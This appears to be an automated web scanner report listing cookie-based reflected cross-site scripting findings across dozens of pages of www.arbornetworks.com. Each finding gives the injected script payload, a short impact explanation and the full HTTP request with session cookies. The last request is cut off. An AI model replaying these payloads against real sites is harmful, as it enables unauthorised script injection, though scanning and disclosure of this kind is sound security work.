The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce73"><script>alert(1)</script>78e956c9366 was submitted in the mbfcookie[lang] cookie. This input was echoed as bce73\"><script>alert(1)</script>78e956c9366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /contact HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbce73"><script>alert(1)</script>78e956c9366; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a345"><script>alert(1)</script>86899845244 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6a345\"><script>alert(1)</script>86899845244 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /de/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6a345"><script>alert(1)</script>86899845244; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c53b"><script>alert(1)</script>f0a1f66cb8a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c53b\"><script>alert(1)</script>f0a1f66cb8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /de/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4c53b"><script>alert(1)</script>f0a1f66cb8a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b5ce"><script>alert(1)</script>46a86177217 was submitted in the mbfcookie[lang] cookie. This input was echoed as 5b5ce\"><script>alert(1)</script>46a86177217 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deeppacketinspection HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en5b5ce"><script>alert(1)</script>46a86177217; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ad11"><script>alert(1)</script>45c595a351a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4ad11\"><script>alert(1)</script>45c595a351a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/9.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4ad11"><script>alert(1)</script>45c595a351a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0de3"><script>alert(1)</script>c78fdd82d6c was submitted in the mbfcookie[lang] cookie. This input was echoed as e0de3\"><script>alert(1)</script>c78fdd82d6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene0de3"><script>alert(1)</script>c78fdd82d6c; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61438"><script>alert(1)</script>bf6eef2e4a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as 61438\"><script>alert(1)</script>bf6eef2e4a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-in-action-global-network-security-solution-resources.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en61438"><script>alert(1)</script>bf6eef2e4a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2791d"><script>alert(1)</script>a9d0e26d8e0 was submitted in the mbfcookie[lang] cookie. This input was echoed as 2791d\"><script>alert(1)</script>a9d0e26d8e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en2791d"><script>alert(1)</script>a9d0e26d8e0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d75d"><script>alert(1)</script>8224aca7549 was submitted in the mbfcookie[lang] cookie. This input was echoed as 3d75d\"><script>alert(1)</script>8224aca7549 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en3d75d"><script>alert(1)</script>8224aca7549; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e43ff"><script>alert(1)</script>b793ea52c1b was submitted in the mbfcookie[lang] cookie. This input was echoed as e43ff\"><script>alert(1)</script>b793ea52c1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/asert-arbor-security-engineering-response-team-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene43ff"><script>alert(1)</script>b793ea52c1b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ae"><script>alert(1)</script>00ecfe4a1d9 was submitted in the mbfcookie[lang] cookie. This input was echoed as 804ae\"><script>alert(1)</script>00ecfe4a1d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/atlas-global-network-threat-analysis-460.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en804ae"><script>alert(1)</script>00ecfe4a1d9; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a0c4"><script>alert(1)</script>58c339d6161 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1a0c4\"><script>alert(1)</script>58c339d6161 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/channel-partners-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1a0c4"><script>alert(1)</script>58c339d6161; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b69"><script>alert(1)</script>158d46c471b was submitted in the mbfcookie[lang] cookie. This input was echoed as 90b69\"><script>alert(1)</script>158d46c471b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/com-5fcontent/view-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en90b69"><script>alert(1)</script>158d46c471b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0bb"><script>alert(1)</script>910074bfd64 was submitted in the mbfcookie[lang] cookie. This input was echoed as dc0bb\"><script>alert(1)</script>910074bfd64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/com-5fcontent/view-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=endc0bb"><script>alert(1)</script>910074bfd64; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa46"><script>alert(1)</script>3a748a1b21e was submitted in the mbfcookie[lang] cookie. This input was echoed as bfa46\"><script>alert(1)</script>3a748a1b21e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/contact-us-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbfa46"><script>alert(1)</script>3a748a1b21e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d01"><script>alert(1)</script>e5f9fcae8fd was submitted in the mbfcookie[lang] cookie. This input was echoed as 56d01\"><script>alert(1)</script>e5f9fcae8fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/contact-us.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en56d01"><script>alert(1)</script>e5f9fcae8fd; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d93e"><script>alert(1)</script>110881cc17b was submitted in the mbfcookie[lang] cookie. This input was echoed as 5d93e\"><script>alert(1)</script>110881cc17b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/customer-solution-briefs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en5d93e"><script>alert(1)</script>110881cc17b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d52"><script>alert(1)</script>29df373fe4f was submitted in the mbfcookie[lang] cookie. This input was echoed as 68d52\"><script>alert(1)</script>29df373fe4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en68d52"><script>alert(1)</script>29df373fe4f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e4"><script>alert(1)</script>c0ea527a00e was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e8e4\"><script>alert(1)</script>c0ea527a00e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/ipv6-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4e8e4"><script>alert(1)</script>c0ea527a00e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e5c7"><script>alert(1)</script>adb9c3d2480 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8e5c7\"><script>alert(1)</script>adb9c3d2480 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/meet-our-partners.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en8e5c7"><script>alert(1)</script>adb9c3d2480; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83849"><script>alert(1)</script>0ce72120c8d was submitted in the mbfcookie[lang] cookie. This input was echoed as 83849\"><script>alert(1)</script>0ce72120c8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-monitoring-security-news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en83849"><script>alert(1)</script>0ce72120c8d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eaac"><script>alert(1)</script>506cb8ffb11 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6eaac\"><script>alert(1)</script>506cb8ffb11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-experts-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6eaac"><script>alert(1)</script>506cb8ffb11; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68ce7"><script>alert(1)</script>36f0a831d17 was submitted in the mbfcookie[lang] cookie. This input was echoed as 68ce7\"><script>alert(1)</script>36f0a831d17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-monitoring-solutions-for-your-industry.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
